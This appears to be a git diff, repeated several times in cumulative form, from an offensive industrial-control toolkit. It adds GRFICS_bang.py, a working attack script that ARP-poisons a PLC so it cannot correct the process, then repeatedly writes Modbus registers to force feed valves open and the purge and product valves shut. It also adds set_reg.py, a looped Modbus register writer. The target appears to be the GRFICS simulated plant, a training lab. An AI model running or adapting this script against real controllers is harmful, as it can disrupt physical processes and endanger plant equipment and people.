diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png
new file mode 100755
index 0000000..78fe94c
--- /dev/null
+++ b/modbus/GRFICS_bang.png
Binary files differ

diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png
new file mode 100755
index 0000000..78fe94c
--- /dev/null
+++ b/modbus/GRFICS_bang.png
Binary files differ
diff --git a/modbus/GRFICS_bang.py b/modbus/GRFICS_bang.py
new file mode 100644
index 0000000..6ab6e0d
--- /dev/null
+++ b/modbus/GRFICS_bang.py
@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+
+"""
+File: GRFICS_bang.py
+Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct.
+"""
+__author__ = '0xRoM'
+from scapy.all import Ether, ARP, srp, send
+from pyModbusTCP.client import ModbusClient
+from multiprocessing import Process
+import time
+import sys
+import os
+
+def _enable_linux_iproute():
+    """
+    Enables IP route ( IP Forward ) in linux-based distro
+    """
+    os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
+
+def get_mac(ip):
+    """
+    Returns MAC address of any device connected to the network
+    If ip is down, returns None instead
+    """
+    ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
+    if ans:
+        return ans[0][1].src
+
+def spoof(target_ip, host_ip, verbose=True):
+    """
+    Spoofs `target_ip` saying that we are `host_ip`.
+    it is accomplished by changing the ARP cache of the target (poisoning)
+    """
+    # get the mac address of the target
+    target_mac = get_mac(target_ip)
+    # craft the arp 'is-at' operation packet, in other words; an ARP response
+    # we don't specify 'hwsrc' (source MAC address)
+    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
+    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
+    # send the packet
+    # verbose = 0 means that we send the packet without printing any thing
+    send(arp_response, verbose=0)
+    if verbose:
+        # get the MAC address of the default interface we are using
+        self_mac = ARP().hwsrc
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
+
+def restore(target_ip, host_ip, verbose=True):
+    """
+    Restores the normal process of a regular network
+    This is done by sending the original informations 
+    (real IP and MAC of `host_ip` ) to `target_ip`
+    """
+    # get the real MAC address of target
+    target_mac = get_mac(target_ip)
+    # get the real MAC address of spoofed (gateway, i.e router)
+    host_mac = get_mac(host_ip)
+    # crafting the restoring packet
+    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
+    # sending the restoring packet
+    # to restore the network to its normal process
+    # we send each reply seven times for a good measure (count=7)
+    send(arp_response, verbose=0, count=7)
+    if verbose:
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
+
+def spoof_wrapper():
+    while True:
+        spoof(arp_target, arp_host, verbose)
+
+arp_target = "192.168.95.2"
+arp_host = "192.168.95.1"
+verbose = False
+_enable_linux_iproute()
+
+try: 
+    p = Process(target=spoof_wrapper)
+    p.start()
+    #p.join() # wait for it to finish! *yuk*
+
+    while True:
+
+        # set A
+        client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,65535)
+        client.close()
+
+        # set B
+        client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,65535)
+        client.close()
+
+        # set purge
+        client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,0)
+        client.close()
+
+        # set product
+        client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,0)
+        client.close()
+
+        #time.sleep(0.2)
+
+except KeyboardInterrupt:
+        print("[!] Detected CTRL+C ! restoring the network, please wait...")
+        restore(arp_target, arp_host)

diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png
new file mode 100755
index 0000000..78fe94c
--- /dev/null
+++ b/modbus/GRFICS_bang.png
Binary files differ
diff --git a/modbus/GRFICS_bang.py b/modbus/GRFICS_bang.py
new file mode 100644
index 0000000..6ab6e0d
--- /dev/null
+++ b/modbus/GRFICS_bang.py
@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+
+"""
+File: GRFICS_bang.py
+Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct.
+"""
+__author__ = '0xRoM'
+from scapy.all import Ether, ARP, srp, send
+from pyModbusTCP.client import ModbusClient
+from multiprocessing import Process
+import time
+import sys
+import os
+
+def _enable_linux_iproute():
+    """
+    Enables IP route ( IP Forward ) in linux-based distro
+    """
+    os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
+
+def get_mac(ip):
+    """
+    Returns MAC address of any device connected to the network
+    If ip is down, returns None instead
+    """
+    ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
+    if ans:
+        return ans[0][1].src
+
+def spoof(target_ip, host_ip, verbose=True):
+    """
+    Spoofs `target_ip` saying that we are `host_ip`.
+    it is accomplished by changing the ARP cache of the target (poisoning)
+    """
+    # get the mac address of the target
+    target_mac = get_mac(target_ip)
+    # craft the arp 'is-at' operation packet, in other words; an ARP response
+    # we don't specify 'hwsrc' (source MAC address)
+    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
+    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
+    # send the packet
+    # verbose = 0 means that we send the packet without printing any thing
+    send(arp_response, verbose=0)
+    if verbose:
+        # get the MAC address of the default interface we are using
+        self_mac = ARP().hwsrc
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
+
+def restore(target_ip, host_ip, verbose=True):
+    """
+    Restores the normal process of a regular network
+    This is done by sending the original informations 
+    (real IP and MAC of `host_ip` ) to `target_ip`
+    """
+    # get the real MAC address of target
+    target_mac = get_mac(target_ip)
+    # get the real MAC address of spoofed (gateway, i.e router)
+    host_mac = get_mac(host_ip)
+    # crafting the restoring packet
+    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
+    # sending the restoring packet
+    # to restore the network to its normal process
+    # we send each reply seven times for a good measure (count=7)
+    send(arp_response, verbose=0, count=7)
+    if verbose:
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
+
+def spoof_wrapper():
+    while True:
+        spoof(arp_target, arp_host, verbose)
+
+arp_target = "192.168.95.2"
+arp_host = "192.168.95.1"
+verbose = False
+_enable_linux_iproute()
+
+try: 
+    p = Process(target=spoof_wrapper)
+    p.start()
+    #p.join() # wait for it to finish! *yuk*
+
+    while True:
+
+        # set A
+        client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,65535)
+        client.close()
+
+        # set B
+        client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,65535)
+        client.close()
+
+        # set purge
+        client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,0)
+        client.close()
+
+        # set product
+        client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,0)
+        client.close()
+
+        #time.sleep(0.2)
+
+except KeyboardInterrupt:
+        print("[!] Detected CTRL+C ! restoring the network, please wait...")
+        restore(arp_target, arp_host)
diff --git a/modbus/set_coil.py b/modbus/set_coil.py
index 02ab399..82acd15 100644
--- a/modbus/set_coil.py
+++ b/modbus/set_coil.py
@@ -24,6 +24,7 @@
     client.write_single_coil(args.coil,True)
 else:
     client.write_single_coil(args.coil,False)
+client.close()
 
 if args.loop:
     i=1 

diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png
new file mode 100755
index 0000000..78fe94c
--- /dev/null
+++ b/modbus/GRFICS_bang.png
Binary files differ
diff --git a/modbus/GRFICS_bang.py b/modbus/GRFICS_bang.py
new file mode 100644
index 0000000..6ab6e0d
--- /dev/null
+++ b/modbus/GRFICS_bang.py
@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+
+"""
+File: GRFICS_bang.py
+Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct.
+"""
+__author__ = '0xRoM'
+from scapy.all import Ether, ARP, srp, send
+from pyModbusTCP.client import ModbusClient
+from multiprocessing import Process
+import time
+import sys
+import os
+
+def _enable_linux_iproute():
+    """
+    Enables IP route ( IP Forward ) in linux-based distro
+    """
+    os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
+
+def get_mac(ip):
+    """
+    Returns MAC address of any device connected to the network
+    If ip is down, returns None instead
+    """
+    ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
+    if ans:
+        return ans[0][1].src
+
+def spoof(target_ip, host_ip, verbose=True):
+    """
+    Spoofs `target_ip` saying that we are `host_ip`.
+    it is accomplished by changing the ARP cache of the target (poisoning)
+    """
+    # get the mac address of the target
+    target_mac = get_mac(target_ip)
+    # craft the arp 'is-at' operation packet, in other words; an ARP response
+    # we don't specify 'hwsrc' (source MAC address)
+    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
+    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
+    # send the packet
+    # verbose = 0 means that we send the packet without printing any thing
+    send(arp_response, verbose=0)
+    if verbose:
+        # get the MAC address of the default interface we are using
+        self_mac = ARP().hwsrc
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
+
+def restore(target_ip, host_ip, verbose=True):
+    """
+    Restores the normal process of a regular network
+    This is done by sending the original informations 
+    (real IP and MAC of `host_ip` ) to `target_ip`
+    """
+    # get the real MAC address of target
+    target_mac = get_mac(target_ip)
+    # get the real MAC address of spoofed (gateway, i.e router)
+    host_mac = get_mac(host_ip)
+    # crafting the restoring packet
+    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
+    # sending the restoring packet
+    # to restore the network to its normal process
+    # we send each reply seven times for a good measure (count=7)
+    send(arp_response, verbose=0, count=7)
+    if verbose:
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
+
+def spoof_wrapper():
+    while True:
+        spoof(arp_target, arp_host, verbose)
+
+arp_target = "192.168.95.2"
+arp_host = "192.168.95.1"
+verbose = False
+_enable_linux_iproute()
+
+try: 
+    p = Process(target=spoof_wrapper)
+    p.start()
+    #p.join() # wait for it to finish! *yuk*
+
+    while True:
+
+        # set A
+        client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,65535)
+        client.close()
+
+        # set B
+        client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,65535)
+        client.close()
+
+        # set purge
+        client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,0)
+        client.close()
+
+        # set product
+        client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(1,0)
+        client.close()
+
+        #time.sleep(0.2)
+
+except KeyboardInterrupt:
+        print("[!] Detected CTRL+C ! restoring the network, please wait...")
+        restore(arp_target, arp_host)
diff --git a/modbus/set_coil.py b/modbus/set_coil.py
index 02ab399..82acd15 100644
--- a/modbus/set_coil.py
+++ b/modbus/set_coil.py
@@ -24,6 +24,7 @@
     client.write_single_coil(args.coil,True)
 else:
     client.write_single_coil(args.coil,False)
+client.close()
 
 if args.loop:
     i=1 
diff --git a/modbus/set_reg.py b/modbus/set_reg.py
new file mode 100644
index 0000000..f3607c5
--- /dev/null
+++ b/modbus/set_reg.py
@@ -0,0 +1,36 @@
+#!/usr/bin/env python
+
+"""
+File: set_reg.py
+Desc: set a specific register to a specific value
+"""
+__author__ = '0xRoM'
+from argparse import ArgumentParser, ArgumentTypeError
+from pyModbusTCP.client import ModbusClient
+import time
+import sys
+
+parser = ArgumentParser()
+parser.add_argument('-i','--ipaddress', action='store', type=str, required=True, help='Input IP Address')
+parser.add_argument('-p','--port', action='store', type=int, required=False, help='Port Number', default=502)
+parser.add_argument('-r','--reg', action='store', type=int, required=True, help='Register Number', default=0)
+parser.add_argument('-v','--val', action='store', type=int, required=True, help='Register Value', default=0)
+parser.add_argument('-l','--loop', action='store_true', required=False, help='loop on')
+parser.add_argument('-t','--timeout', action='store', type=float, required=False, help='request every X seconds', default=2)
+args = parser.parse_args()
+
+client=ModbusClient(host=args.ipaddress,port=args.port,auto_open=True,auto_close=True,timeout=10)
+client.write_single_register(args.reg,args.val)
+client.close()
+
+if args.loop:
+    i=1 
+    while True:
+        client=ModbusClient(host=args.ipaddress,port=args.port,auto_open=True,auto_close=True,timeout=10)
+        client.write_single_register(args.reg,args.val)
+        client.close()
+        print '\r>>packet: %d' % i,
+        sys.stdout.flush()
+        i+=1
+        time.sleep(args.timeout)
+